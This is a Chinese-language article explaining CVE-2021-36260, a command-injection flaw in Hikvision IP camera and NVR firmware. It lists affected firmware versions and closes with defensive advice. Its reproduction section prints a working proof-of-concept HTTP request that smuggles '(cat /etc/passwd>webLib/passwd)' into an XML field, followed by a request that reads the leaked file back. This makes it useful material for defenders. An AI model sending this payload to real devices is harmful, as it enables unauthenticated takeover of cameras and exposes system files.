引言
随着物联网技术的快速发展,网络摄像头已经成为家庭、企业等场景中不可或缺的监控设备。然而,近期关于海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)的曝光,引发了公众对网络摄像头安全的广泛关注。本文将深入解析这一漏洞,探讨其影响及防范措施。
漏洞简介
CVE-2021-36260是一个未认证的远程代码执行漏洞,影响海康威视IP摄像头和NVR设备固件。该漏洞源于对输入参数检验不充分,未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备,即可实现远程命令执行。
影响版本
受影响的网络摄像头型号及版本如下:
- IPCE0:IPCE0CNSTD5.4.6180112
- IPCE1:未知
- IPCE2:IPCE2ENSTD5.5.52180620
- IPCE4:未知
- IPCE6:IPCKE6ENSTD5.5.100200226
- IPCE7:IPCKE7ENSTD5.5.120200604
- IPCG3:IPCG3ENSTD5.5.160210416
- IPCG5:IPCG5ENSTD5.5.113210317
- IPCH1:IPCH1ENSTD5.4.61181204
- IPCH5:IPCPH5ENSTD5.5.85201120
- IPCH8:Factory installed firmware mid 2021
- IPCR2:IPCR2ENSTDV5.4.81180203
漏洞复现
以下是一个漏洞复现的示例:
- 执行命令,将以下内容写入要执行的命令到文件中:
PUT /SDK/webLanguage HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Host: XXXX
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 91
<?xml version="1.0" encoding="UTF-8"?>
<language>(cat /etc/passwd>webLib/passwd)</language>
- 读取命令执行结果:
GET /passwd HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: /
防范措施
为防范CVE-2021-36260漏洞,建议采取以下措施:
更新设备固件:厂商已发布针对该漏洞的固件更新,用户应及时更新设备固件。
修改默认密码:默认密码是网络摄像头安全的一大隐患,用户应修改默认密码,并使用强密码。
关闭不必要的端口:关闭不必要的端口可以降低设备被攻击的风险。
使用防火墙:开启防火墙可以阻止未经授权的访问。
定期检查设备:定期检查设备的安全状态,及时发现并修复漏洞。
总结
网络摄像头安全漏洞的存在,提醒我们在享受物联网带来的便利的同时,也要关注其安全隐患。通过采取上述防范措施,我们可以降低网络摄像头被攻击的风险,保障个人隐私和企业安全。